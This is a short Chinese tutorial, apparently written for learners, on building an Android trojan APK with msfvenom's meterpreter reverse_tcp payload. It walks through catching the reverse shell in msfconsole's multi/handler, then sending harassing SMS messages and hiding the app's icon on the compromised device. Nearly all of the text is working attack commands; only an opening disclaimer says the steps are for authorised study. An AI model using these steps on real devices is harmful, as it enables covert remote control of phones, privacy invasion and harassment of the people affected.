2023.9.10
注意:在进行安全研究和学习时,请确保遵循相关法律法规并获得授权,以避免非法操作或侵犯他人隐私。这些步骤仅供学习和研究使用,不得用于非法用途。
一、攻击前
1、kali提权
2、查看kali ip
3、生成木马软件 ps:可在在muma.apk前加入路径以保存到其他地方
msfvenom -p android/meterpreter/reverse_tcp lhost=<攻击机ip> lport=<自定义端口> >muma.apk
4、将创建的木马软件安装在模拟器上
二、开始测试
1、打开 msfconsole
msfconsole
2、使用攻击模块
use exploit/multi/handler
3、设置负载
set payload android/meterpreter/reverse_tcp
4、设置ip
set lhost <攻击机ip>
5、设置端口
set lport <和木马软件的端口一样>
6、运行
run
7、在安卓模拟器上点击木马软件即可成功
三、成功后
1、可以使用 help 获取相应指令
例1:可以发送骚扰短信
send_sms -d <理论上是手机号> -t hello
例2:隐藏木马软件图标 ps:设置里依然能看到
hide_app_icon